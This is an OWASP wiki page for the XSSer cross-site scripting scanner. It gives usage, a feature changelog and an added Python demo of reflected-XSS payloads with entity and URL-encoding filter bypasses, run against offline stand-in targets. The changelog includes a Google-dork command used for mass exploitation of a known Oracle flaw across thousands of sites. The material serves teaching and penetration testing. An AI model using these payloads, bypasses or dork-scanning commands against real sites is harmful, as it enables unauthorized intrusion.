Difference between revisions of "OWASP XSSER"

Revision as of 11:35, 29 April 2013

OWASP XSSer Project
Web application vulnerability scanner / Security auditor

Project Name: XSSer: The Cross Site Scripting Framework

Short Project Description:

Cross Site "Scripter" is an automatic framework to detect, exploit and report XSS vulnerabilities in web-based applications. It includes several options for bypassing filters and a number of special code-injection techniques.

Key Project Information
   * Project Leader:
   * Next Version
   * Mailing List: Subscribe - Use
   * Project Type: Pentesting tool
   * NLNet Awards
   * OWASP tool

Release Status: v1.6b - "Grey Swarm"
Main Links: SF Website, Code Releases
Related Documentation: Paper: 'XSS for fun and profit': English - Spanish

GSoC 2013 Proposal

OWASP XSSer Project Ideas

Student presentations, questions and more: Mailing list archive: GSoC13 thread

Proposals 'on stage':

Current Version

XSSer v1.6b ("The Mosquito: Grey Swarm!")

This version includes more features in the GTK+ interface.

[Screenshots of the v1.6b GTK+ interface: Xsser-greyswarm, Xsser-greyswarm-donate, Xsser-greyswarm-map, Xsser-greyswarm-check, Xsser-greyswarm-conn]

TIP: type 'xsser --gtk' to start the GTK+ interface from a shell, or run XSSer directly from the desktop menu.


XSSer runs on many platforms. It requires Python and the following libraries:

- python-pycurl - Python bindings to libcurl
- python-beautifulsoup - error-tolerant HTML parser for Python
- python-libxml2 - Python bindings for the GNOME XML library
- python-geoip - Python bindings for the GeoIP IP-to-country resolver library

On Debian-based systems (e.g. Ubuntu), run:

sudo apt-get install python-pycurl python-beautifulsoup python-libxml2 python-geoip

How to Use

xsser [OPTIONS] [-u <url> |-i <file> |-d <dork>] [-g <get> |-p <post> |-c <crawl>] [Request(s)] [Vector(s)] [Bypasser(s)] [Technique(s)] [Final Injection(s)]
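The synopsis names Vector(s) and Bypasser(s), and the project description names the detect / bypass / report loop they feed. The following is an added example written for this page, not code from XSSer: a marker-carrying vector is sent to a target in several encodings, and each response is classified by whether the raw vector came back executable. The four target functions, the MARKER value and the particular vector and bypasser sets are constructed for the example so that it runs offline; a real scan would replace the target function with an HTTP request (XSSer itself uses pycurl for that).

```python
"""
Added example (not XSSer's own code): a minimal reflected-XSS probe that
shows the detect / bypass / report loop in miniature.
The targets below are constructed stand-ins for a real URL; MARKER, the
vector set and the bypasser set are choices made for this example.
"""
import html
import re
import urllib.parse

MARKER = "xs3r7q"  # arbitrary token, chosen so it cannot occur in a page by accident

# Vector(s): two injection vectors, each carrying the marker so we can find it again.
VECTORS = {
    "script": f'"><script>alert("{MARKER}")</script>',
    "img-onerror": f'"><img src=x onerror=alert("{MARKER}")>',
}

# Bypasser(s): the same vector in alternative encodings. A filter that
# inspects the request before the application decodes it can be evaded
# by whichever form it does not recognise.
BYPASSERS = {
    "plain": lambda p: p,
    "url": lambda p: urllib.parse.quote(p, safe=""),
    "hex-entities": lambda p: "".join(f"&#x{ord(c):x};" for c in p),
    "dec-entities": lambda p: "".join(f"&#{ord(c)};" for c in p),
}


def _decode_entities(s, rounds=3):
    """Undo HTML entity encoding repeatedly (covers double-encoded output)."""
    for _ in range(rounds):
        decoded = html.unescape(s)
        if decoded == s:
            break
        s = decoded
    return s


def classify(response, vector):
    """Verdict for one injection: did the raw vector survive into the page?"""
    if vector in response:
        return "vulnerable"   # echoed back verbatim: the browser will execute it
    if MARKER in _decode_entities(response):
        return "inert"        # reflected, but encoded or mangled on the way
    return "absent"           # not reflected at all


# --- constructed targets: each receives the already URL-decoded parameter ---

def target_unfiltered(q):
    return f'<input name="q" value="{q}">'


def target_escaped(q):
    # correct output encoding for an attribute context
    return f'<input name="q" value="{html.escape(q, quote=True)}">'


def target_blacklist(q):
    # naive denylist: removes "<script" and nothing else
    cleaned = re.sub(r"<script", "", q, flags=re.I)
    return f'<input name="q" value="{cleaned}">'


def target_filter_then_decode(q):
    # the denylist runs first, then the app "normalises" entities; the
    # filter never sees the decoded form, so entity-encoded vectors pass
    cleaned = re.sub(r"<script", "", q, flags=re.I)
    return f'<input name="q" value="{html.unescape(cleaned)}">'


def scan(target):
    """Try every vector/bypasser pair against one target; return {(vector, bypasser): verdict}."""
    report = {}
    for vname, vector in VECTORS.items():
        for bname, encode in BYPASSERS.items():
            sent = encode(vector)
            # the web server URL-decodes a query parameter exactly once before the app sees it
            response = target(urllib.parse.unquote(sent))
            report[(vname, bname)] = classify(response, vector)
    return report


def findings(target):
    """Sorted list of (vector, bypasser) pairs that produced an executable reflection."""
    return sorted(k for k, v in scan(target).items() if v == "vulnerable")


if __name__ == "__main__":
    for t in (target_unfiltered, target_escaped, target_blacklist, target_filter_then_decode):
        print(f"{t.__name__}:")
        for (vname, bname), verdict in scan(t).items():
            print(f"  {vname:12s} {bname:13s} {verdict}")
```

The "vulnerable" verdict is a string match on the response body, which is the same heuristic a scanner starts from: it tells you the vector was echoed unencoded, not that it executed in a given browser. Confirm hits in a browser (or with a callback the payload triggers) before reporting them. The only target that resists every pair is the one that output-encodes for its context; the denylist is beaten by a second vector, and the filter-before-decode ordering is beaten by the entity bypassers.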



November, 28, 2011:

Core: Added Drop Cookie option + Added Random IP X-Forwarded-For option + Added Random X-Client-IP option + Added GSS and NTLM authentication methods + Added Ignore proxy option + Added TCP-NODELAY option + Added Follow redirects option + Added Follow redirects limiter parameter + Added Auto-HEAD precheck system + Added No-HEAD option + Added Isalive option + Added Check at url option (Blind XSS) + Added Reverse Check parameter + Added PHPIDS (v.0.6.5) exploit + Added More vectors to auto-payloading + Added HTML5 studied vectors + Fixed Different bugs on core + Fixed Curl handler options + Fixed Dorkerers system + Fixed Bugs on results propagation + Fixed POST requests.

GTK: Added New features to GTK controller + Added Detailed views to GTK interface.

February, 25, 2011:

Added package for Archlinux.

February, 24, 2011:

Core: Added GTK option + Heuristic test + HTTP Response Splitting (a.k.a. Induced attack!) + DoS (Server) injection + Final code (added DCP & DOM injections) + Update option + Code clean + Bugfixing + New options menu + More advanced statistics system + Updated dorkerers list.

GTK: Intuitive navigation + Wizard helper ("build your pentest by answering some questions") + Expert visor (with target(s) geolocation included) + Documentation.

November, 13, 2010:

XSSer package for Archlinux can be found in the AUR.

November, 11, 2010:

Created XSSer package (v1.0) for Ubuntu/Debian based systems.

November, 9, 2010:

Added more advanced statistics results + Bugfixing.

November, 7, 2010:

Added "final remote injections" option + Cross Flash Attack! + Cross Frame Scripting + Data Control Protocol Injections + Base64 (rfc2397) PoC + OnMouseMove PoC + Browser launcher + Code clean + Bugfixing + New options menu + Pre-check system + Crawler spidering clones + More advanced statistics system + "Mana" output results.

October, 8, 2010:

POC: Detecting, exploiting and reporting the "fcgi-bin/echo" Oracle vulnerability with XSSer

./XSSer -d "'inurl:fcgi-bin/echo'" --De "google" --proxy "" -s --tweet

Results of the -botnet- attack in real time:


Reported: approx. 3,000 vulnerable websites (XSSer storm!!).

September 22, 2010:

Added XML exporter + ImageXSS + New dorker engines (10 in total) + Core clean + Bugfixing + Social Networking XSS auto-publisher + Started -federated- XSS (full disclosure) pentesting botnet.

August 20, 2010:

Added attack payloads to auto-payloader (26 new injections) + POST + Statistics + URL Shorteners + IP Octal + Post-processing payloading + DOM Shadows! + Cookie injector + Browser DoS (Denial of Service).

July 1, 2010:

Dorking + Crawling + IP DWORD + Core clean.

April 19, 2010:

HTTPS implemented + patched bugs.

March 22, 2010:

Added "inject your own payload" option. Can be used with all character encoding -bypassers- of XSSer.

March 18, 2010:

Added attack payloads to auto-payloader (62 different XSS injections).

March 16, 2010:

Added new payload encoders to bypass filters.


Download roadmap planning: Next Version



   * - channel: #xsser

Mailing lists:

   * Owasp: Subscribe Write
   * Sourceforge: Subscribe Write

Project Leader:

 GPG ID: 0xB8AC3776
   * Website:
   * Email:
         o psy
         o epsylon
   * Microblogging: